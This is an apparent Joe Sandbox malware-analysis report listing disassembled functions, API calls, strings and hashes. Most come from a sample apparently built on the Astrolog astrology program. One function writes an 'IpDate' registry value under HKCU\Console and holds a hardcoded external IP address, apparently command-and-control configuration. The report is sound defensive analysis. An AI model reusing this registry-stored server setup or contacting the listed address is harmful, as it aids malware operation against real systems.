Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID:
String ID: %13.9f %13.9f$%-4.4s$%-4d$%.3s: %2d %2d %10.7f$%3d %.3s %12.9f,$%4d %13.9f,$%cYF $%cqb %.3s %d %d %s %s $%czi "%s" "%s"$%d%d%d%.2f%.2f%.2f%.2f$%s %s$%s%s$710$@AI%s ; %s chart info.$@AP%s ; %s chart positions.$Astrolog$Autodetect$Can't output chart with no time/space to file.$File '%s' can not be created.$H_%c: %2d %2d %10.7f$[%c]: %3d %12.8f
API String ID: 0-1133567577
Opcode ID: deae352a8a8ed690abb5691d368e3e93451c7032b4f9f1c36713eec18a4ed01b
Instruction ID: 5cceeb8f60be313b3b71f0217e86d3f3fb9c6cf8d65e8e2ce3f57967ec9b6f03
Opcode Fuzzy Hash: deae352a8a8ed690abb5691d368e3e93451c7032b4f9f1c36713eec18a4ed01b
Instruction Fuzzy Hash: F8F19BB2E08208EADF15FB65DC48EAC7B78FB06704F120959E4C513955DB3A5828CFA6

Function 6C3C8F1B Relevance: 71.9, APIs: 20, Strings: 21, Instructions: 119COMMON

Download Yara Rule

APIs

_fprintf.LIBCMT ref: 6C3C8F26
_fprintf.LIBCMT ref: 6C3C8F41

Part of subcall function 6C3D3864: __lock_file.LIBCMT ref: 6C3D38AB
Part of subcall function 6C3D3864: __stbuf.LIBCMT ref: 6C3D392F
Part of subcall function 6C3D3864: __output_l.LIBCMT ref: 6C3D393F
Part of subcall function 6C3D3864: __ftbuf.LIBCMT ref: 6C3D3949

_fprintf.LIBCMT ref: 6C3C8F5A
_fprintf.LIBCMT ref: 6C3C8F74
_fprintf.LIBCMT ref: 6C3C8F89
_fprintf.LIBCMT ref: 6C3C8FB5
_fprintf.LIBCMT ref: 6C3C8FC5
_fprintf.LIBCMT ref: 6C3C8FD5
_fprintf.LIBCMT ref: 6C3C8FE9
_fprintf.LIBCMT ref: 6C3C8FF9
_fprintf.LIBCMT ref: 6C3C9015
_fprintf.LIBCMT ref: 6C3C902D
_fprintf.LIBCMT ref: 6C3C903D
_fprintf.LIBCMT ref: 6C3C9085
_fprintf.LIBCMT ref: 6C3C9095
_fprintf.LIBCMT ref: 6C3C90A5
_fprintf.LIBCMT ref: 6C3C90B9
_fprintf.LIBCMT ref: 6C3C90C9
_fprintf.LIBCMT ref: 6C3C90DC
_fprintf.LIBCMT ref: 6C3C90F6

Strings

/languagelevel where{pop languagelevel}{1}ifelse 2 lt{/sf{exch findfont exch dup type/arraytype eq{makefont}{scalefont}ifelse setfont}bind def/rf{gsave newpath4 -2 roll moveto dup 0 exch rlineto exch 0 rlineto neg 0 exch rlineto closepathfill grestore}bind, xrefs: 6C3C8FDE, 6C3C90AE
EPSF-2.0, xrefs: 6C3C8F36
%%%%BoundingBox: %d %d %d %d, xrefs: 6C3C907A
%%%%Title: %s, xrefs: 6C3C8F4F
%%%%DocumentFonts: (atend), xrefs: 6C3C9032
%%%%CreationDate: %s, xrefs: 6C3C8F7E
%%%%Creator: %s %s, xrefs: 6C3C8F69
October 2020, xrefs: 6C3C8F79
%%%%EndProcSet, xrefs: 6C3C90BE
%%!PS-Adobe-2.0, xrefs: 6C3C8F1B
%%%%BoundingBox: 0 0 %d %d, xrefs: 6C3C8FAA
%%%%Page: 1 1, xrefs: 6C3C90D1
gsave, xrefs: 6C3C90EB
%%%%EndComments, xrefs: 6C3C8FBA, 6C3C908A
0 0 %d %d rc, xrefs: 6C3C900A
%%%%EndSetup, xrefs: 6C3C8FEE
Astrolog, xrefs: 6C3C8F64
7.10, xrefs: 6C3C8F5F
%%%%Pages: 1 1, xrefs: 6C3C9022
%%%%BeginSetup, xrefs: 6C3C8FCA
%%%%BeginProcSet: common, xrefs: 6C3C909A

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _fprintf$__ftbuf__lock_file__output_l__stbuf
String ID: %%%%Title: %s$ EPSF-2.0$%%!PS-Adobe-2.0$%%%%BeginProcSet: common$%%%%BeginSetup$%%%%BoundingBox: %d %d %d %d$%%%%BoundingBox: 0 0 %d %d$%%%%CreationDate: %s$%%%%Creator: %s %s$%%%%DocumentFonts: (atend)$%%%%EndComments$%%%%EndProcSet$%%%%EndSetup$%%%%Page: 1 1$%%%%Pages: 1 1$/languagelevel where{pop languagelevel}{1}ifelse 2 lt{/sf{exch findfont exch dup type/arraytype eq{makefont}{scalefont}ifelse setfont}bind def/rf{gsave newpath4 -2 roll moveto dup 0 exch rlineto exch 0 rlineto neg 0 exch rlineto closepathfill grestore}bind$0 0 %d %d rc$7.10$Astrolog$October 2020$gsave
API String ID: 868309879-2695015111
Opcode ID: 2edb1d63a3aaeb6cb03ff98040f47ca226a336ceba24e91b27139a883bb8ff1f
Instruction ID: 1a62d50d8b5a1dc795d07a23f725d904d40bc3700b3e7e469996450c7aec83dc
Opcode Fuzzy Hash: 2edb1d63a3aaeb6cb03ff98040f47ca226a336ceba24e91b27139a883bb8ff1f
Instruction Fuzzy Hash: D64189727422547ECE91F716CC05F983A31D74722DB219432F148A3961E7325DAAEE85

Function 6C3B2D1A Relevance: 65.2, APIs: 10, Strings: 27, Instructions: 429COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 6C3B2DD0
_sprintf.LIBCMT ref: 6C3B2EC8

Strings

Solar: %.4s%s on %.3s, xrefs: 6C3B30C5
3D , xrefs: 6C3B2F71
Special: Dwad mode, xrefs: 6C3B3193
Sidereal, xrefs: 6C3B3008
Special: Dwad level %d, xrefs: 6C3B31A0
%s, %s, xrefs: 6C3B3012
's sign, xrefs: 6C3B3041, 6C3B3059, 6C3B30B8
Geocentric, xrefs: 6C3B2FE6
Special: Geodetic houses, xrefs: 6C3B30F4
Special: Navamsa mode, xrefs: 6C3B31CF
%s%cT Zone %s%s, xrefs: 6C3B2EC2
Composite chart, xrefs: 6C3B2D98
%.3s %s, xrefs: 6C3B2DCA
Special: Domal mode, xrefs: 6C3B310F
Heliocentric, xrefs: 6C3B2FCC
A, xrefs: 6C3B2E77
Julian Day: %13.5f, xrefs: 6C3B31F5
Rotate: %.3s to %.3s%s, xrefs: 6C3B306B
2D , xrefs: 6C3B2F7C
Barycentric, xrefs: 6C3B2FD3
%s%s houses, xrefs: 6C3B2F9C
No time or space, xrefs: 6C3B2D84
Progressed To: %s, xrefs: 6C3B3237
Tropical, xrefs: 6C3B2FFB, 6C3B300E
Special: Harmonic %.7s, xrefs: 6C3B3164
Special: Decan mode, xrefs: 6C3B312A
Topocentric, xrefs: 6C3B2FED

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf
String ID: %s%cT Zone %s%s$%.3s %s$%s%s houses$%s, %s$'s sign$2D $3D $A$Barycentric$Composite chart$Geocentric$Heliocentric$Julian Day: %13.5f$No time or space$Progressed To: %s$Rotate: %.3s to %.3s%s$Sidereal$Solar: %.4s%s on %.3s$Special: Decan mode$Special: Domal mode$Special: Dwad level %d$Special: Dwad mode$Special: Geodetic houses$Special: Harmonic %.7s$Special: Navamsa mode$Topocentric$Tropical
API String ID: 1467051239-3787655438
Opcode ID: 6bad1f0a9d893197690006c2f7a12c6a1ae7fdd4cdf48cfddd31d1bb23be60c3
Instruction ID: 03a6908a6dc1c1bd42db0bc5969e771439d141c7ffcd7245c7b9c15b7905fd79
Opcode Fuzzy Hash: 6bad1f0a9d893197690006c2f7a12c6a1ae7fdd4cdf48cfddd31d1bb23be60c3
Instruction Fuzzy Hash: 0EE13EB2A045449FCF00FFA5C948DDA377CEB9A318B24465AE544FBE44DB36A444CFA2

Function 6C3A9D6D Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

PrintDlgA.COMDLG32(6C4488B0), ref: 6C3A9D86
GlobalLock.KERNEL32(00000000), ref: 6C3A9DAF
GlobalUnlock.KERNEL32 ref: 6C3A9DCC
GlobalLock.KERNEL32(00000000), ref: 6C3A9DDC
CreateDCA.GDI32(?,?,?,?), ref: 6C3A9DEB
GlobalUnlock.KERNEL32(00000000), ref: 6C3A9E03
GlobalFree.KERNEL32(00000000), ref: 6C3A9E1B
GlobalFree.KERNEL32(00000000), ref: 6C3A9E2D
SetAbortProc.GDI32(00000000,6C3AA01F), ref: 6C3A9E3B
StartDocA.GDI32(00000000,?), ref: 6C3A9E57
DeleteDC.GDI32(00000000), ref: 6C3A9E62
CreateDialogParamA.USER32(000000C9,6C3AA088,00000000), ref: 6C3A9E8A
ShowWindow.USER32(00000000,00000001), ref: 6C3A9EA2
EnableWindow.USER32(00000000), ref: 6C3A9EAF
StartPage.GDI32(00000000), ref: 6C3A9EB6
SetMapMode.GDI32(00000000,00000008), ref: 6C3A9F04
GetDeviceCaps.GDI32(00000000,00000008), ref: 6C3A9F13
GetDeviceCaps.GDI32(00000000,0000000A), ref: 6C3A9F1B
SetViewportOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 6C3A9F24
SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 6C3A9F32
EndPage.GDI32(00000000), ref: 6C3A9FE9
EndDoc.GDI32(00000000), ref: 6C3A9FF0
EnableWindow.USER32(00000001,?), ref: 6C3A9FFE
DestroyWindow.USER32 ref: 6C3AA00A
DeleteDC.GDI32(00000000), ref: 6C3AA011

Strings

Astrolog, xrefs: 6C3A9E4D

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: Global$Window$CapsCreateDeleteDeviceEnableFreeLockPageStartUnlockViewport$AbortDestroyDialogModeParamPrintProcShow
String ID: Astrolog
API String ID: 180290428-1561296214
Opcode ID: 9271cbce6fab2cea5a74c791052ae0f7df62dd311dde63180883052b44a94b1d
Instruction ID: 88f1becc256f3395fb71092ebf0febb8632e6a814fc0a15d1443b33536ede921
Opcode Fuzzy Hash: 9271cbce6fab2cea5a74c791052ae0f7df62dd311dde63180883052b44a94b1d
Instruction Fuzzy Hash: 097117B1B00205EBDF00FFA6DC8895A7BF9FB8A3197208817F515E6210E7358851DF94

Function 6C365FE6 Relevance: 44.2, APIs: 9, Strings: 16, Instructions: 458COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 6C36606B
_sprintf.LIBCMT ref: 6C366107
_sprintf.LIBCMT ref: 6C366188
_sprintf.LIBCMT ref: 6C366224

Strings

H;Gl, xrefs: 6C366136
%3d, xrefs: 6C36654C
H;Gl, xrefs: 6C366030
%02d', xrefs: 6C36621E, 6C36636E, 6C36657F
%c%2d, xrefs: 6C366535
2>, xrefs: 6C366015
H;Gl, xrefs: 6C3661C2
1 , xrefs: 6C36608C
, xrefs: 6C36647C, 6C366481, 6C366596
V , xrefs: 6C36612C
%.3s, xrefs: 6C366026, 6C366069, 6C366186, 6C3662C6, 6C366353, 6C366468, 6C36654B
, xrefs: 6C3661B8
H;Gl, xrefs: 6C36639C
H;Gl, xrefs: 6C366255
%02d", xrefs: 6C36658C
%2d%c, xrefs: 6C366101, 6C366334, 6C3664D0

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf
String ID: $1 $V $ $ 2>$%.3s$%02d"$%02d'$%2d%c$%3d$%c%2d$H;Gl$H;Gl$H;Gl$H;Gl$H;Gl
API String ID: 1467051239-1109211154
Opcode ID: fc53bf8eb42a2cb0bf21c37e4047be3e70631b38edbe73af50ce12fe7c8ddb05
Instruction ID: c7a3061981fd02ed37ca24b22c5c14cbc9a706e028593d10681f9d5d60edc463
Opcode Fuzzy Hash: fc53bf8eb42a2cb0bf21c37e4047be3e70631b38edbe73af50ce12fe7c8ddb05
Instruction Fuzzy Hash: 70F127B3E002848BEF15DBA2C852FEC7775EB06398F140519D441DBE98CB79D949CE26

Function 6C362EA6 Relevance: 44.2, APIs: 11, Strings: 14, Instructions: 438COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 6C36309A
_sprintf.LIBCMT ref: 6C3630C7
_sprintf.LIBCMT ref: 6C3630FC
_sprintf.LIBCMT ref: 6C363151
_sprintf.LIBCMT ref: 6C3631A1

Part of subcall function 6C371F74: __floor_pentium4.LIBCMT ref: 6C371FBC
Part of subcall function 6C371F74: _sprintf.LIBCMT ref: 6C371FFB
Part of subcall function 6C371F74: __floor_pentium4.LIBCMT ref: 6C37201A
Part of subcall function 6C371F74: _sprintf.LIBCMT ref: 6C372038

_sprintf.LIBCMT ref: 6C3631E9
_sprintf.LIBCMT ref: 6C3632A6
_sprintf.LIBCMT ref: 6C3632F1
_sprintf.LIBCMT ref: 6C363354
_sprintf.LIBCMT ref: 6C363455
_sprintf.LIBCMT ref: 6C363490

Strings

%s, xrefs: 6C36319B
[%%%d.%df%%%d.%df] [%%%d.%df%%%d.%df], xrefs: 6C36334E
%s Vector%s%s Moon Vector, xrefs: 6C3630F6
Sun, xrefs: 6C3630DE
Earth, xrefs: 6C3630E5, 6C3630F2
%2d%s, xrefs: 6C3631E3
Star #%2d, xrefs: 6C36348A
%.2f%c), xrefs: 6C3632D8, 6C3632EC
Body %s%sAltitude%s %s%sAzimuth%s%s%s Azi. Vector%s , xrefs: 6C3630C1
Uranian #%d, xrefs: 6C36347F
%.3f%c), xrefs: 6C3632D1
(%.3f%c, xrefs: 6C36328C
(%.2f%c, xrefs: 6C363293, 6C36329C, 6C36329D, 6C3632A4
%-4.4s: , xrefs: 6C36314B

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$__floor_pentium4
String ID: Body %s%sAltitude%s %s%sAzimuth%s%s%s Azi. Vector%s $ Star #%2d$ Uranian #%d$ %.2f%c)$ %.3f%c)$ %2d%s$ %s$ (%.2f%c$ (%.3f%c$ [%%%d.%df%%%d.%df] [%%%d.%df%%%d.%df]$%-4.4s: $%s Vector%s%s Moon Vector$Earth$Sun
API String ID: 175470247-281674729
Opcode ID: 2454af096124a6c4891d459993cad29179b1a0a72c0f51a03483698169f3ee7b
Instruction ID: 25277263f134d3e626ec62a93a053b89f6c435f89bce4179a2f8372620816ce5
Opcode Fuzzy Hash: 2454af096124a6c4891d459993cad29179b1a0a72c0f51a03483698169f3ee7b
Instruction Fuzzy Hash: 48F1E1B1904509DADF24EF52DC48BEDBB78EB45318F2106D9D0C863988DF764AA8CF52

Function 6C372D55 Relevance: 40.4, APIs: 6, Strings: 17, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 6C371AD3: SetTextColor.GDI32(00000000), ref: 6C371B19

Part of subcall function 6C370F98: _sprintf.LIBCMT ref: 6C370FAD

_sprintf.LIBCMT ref: 6C372E48
_sprintf.LIBCMT ref: 6C372E73
_sprintf.LIBCMT ref: 6C372EA2
_sprintf.LIBCMT ref: 6C372EFF
_sprintf.LIBCMT ref: 6C372F23
_sprintf.LIBCMT ref: 6C372F84

Strings

Part of , xrefs: 6C372E02
in the area of life dealing with, xrefs: 6C372F64
(This bit plays only a minor part in their psyche.), xrefs: 6C372FAC
This person, xrefs: 6C372E90, 6C372E95
%s., xrefs: 6C372F16, 6C372F21, 6C372F82
and %d%s House:, xrefs: 6C372E6D
Retrograde , xrefs: 6C372E21, 6C372E41
%s, and, xrefs: 6C372EF9
It is easy for them to express this part of themselves., xrefs: 6C372FB7
very, xrefs: 6C372EE2
%s%s%s%s in %s, xrefs: 6C372E42
Most often this manifests, xrefs: 6C372F36
This is a major aspect of their psyche!, xrefs: 6C372FA1
Athena, xrefs: 6C372DDC
%s's, xrefs: 6C372E9C
It is difficult for them to express this part of themselves., xrefs: 6C372FC2
in an independent, backward, introverted manner, and, xrefs: 6C372F5A

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$ColorText
String ID: Athena$%s%s%s%s in %s$%s's$%s, and$%s.$(This bit plays only a minor part in their psyche.)$It is difficult for them to express this part of themselves.$It is easy for them to express this part of themselves.$Most often this manifests$Part of $Retrograde $This is a major aspect of their psyche!$This person$and %d%s House:$in an independent, backward, introverted manner, and$in the area of life dealing with$very
API String ID: 777165778-850604435
Opcode ID: 3110bc4c9cd9a259ed704017130608e8c22f9447116f458af664aa25c59fdd54
Instruction ID: 5ecbefd4ab47d95dedd606798dbb3dcec4cbe98e1e6d9c46b589157d95415de3
Opcode Fuzzy Hash: 3110bc4c9cd9a259ed704017130608e8c22f9447116f458af664aa25c59fdd54
Instruction Fuzzy Hash: F85107B2A00118CBCB30EB25CA89FDDB77A6B57308F454151D1C06BA04C77ED9998FBA

Function 03D9622D Relevance: 40.4, APIs: 9, Strings: 14, Instructions: 161registrysleepCOMMON

Download Yara Rule

APIs

Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC

_memmove.LIBCMT ref: 03D96242
RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 03D9625D
RegDeleteValueW.ADVAPI32(?,IpDate), ref: 03D9626D
RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 03D9628A
_memset.LIBCMT ref: 03D962AB
RegCloseKey.ADVAPI32(?), ref: 03D962F2
_memset.LIBCMT ref: 03D96313
RegCloseKey.ADVAPI32(?), ref: 03D96403
Sleep.KERNEL32(000007D0), ref: 03D9640E

Part of subcall function 03D9ABD2: std::exception::exception.LIBCMT ref: 03D9AC21
Part of subcall function 03D9ABD2: std::exception::exception.LIBCMT ref: 03D9AC3B
Part of subcall function 03D9ABD2: __CxxThrowException@8.LIBCMT ref: 03D9AC4C

Strings

45.201.245.153, xrefs: 03D9638B
t3:, xrefs: 03D963F0
127.0.0.1, xrefs: 03D963C4
p3:, xrefs: 03D963C9
o1:, xrefs: 03D9636C
45.201.245.153, xrefs: 03D96355
IpDate, xrefs: 03D96267, 03D96284
Console, xrefs: 03D96253
t2:, xrefs: 03D963B7
t1:, xrefs: 03D9637E
p2:, xrefs: 03D96390
o2:, xrefs: 03D963A5
o3:, xrefs: 03D963DB
p1:, xrefs: 03D9635A

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc_memmove
String ID: 127.0.0.1$45.201.245.153$45.201.245.153$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
API String ID: 3267482280-2240284790
Opcode ID: 9b16428cc3664b6655e74af1251ffd1ce6e764a49ff59c9eac395bed9e7b4741
Instruction ID: ee102f892a9ffe0e8cf6c6a03cde243f2444e128117dad368129e86e1c6563fd
Opcode Fuzzy Hash: 9b16428cc3664b6655e74af1251ffd1ce6e764a49ff59c9eac395bed9e7b4741
Instruction Fuzzy Hash: 5C41D776781300FFE610FB709C46F6E7268DF44B14F044059FA156E2C6E7A0F51986BA

Function 03DA2BFC Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2C04
__mtterm.LIBCMT ref: 03DA2C10

Part of subcall function 03DA28DB: DecodePointer.KERNEL32(0000000C,03D9C6D7,03D9C6BD,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA28EC
Part of subcall function 03DA28DB: TlsFree.KERNEL32(0000002C,03D9C6D7,03D9C6BD,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2906
Part of subcall function 03DA28DB: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,03D9C6D7,03D9C6BD,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA8C90
Part of subcall function 03DA28DB: _free.LIBCMT ref: 03DA8C93
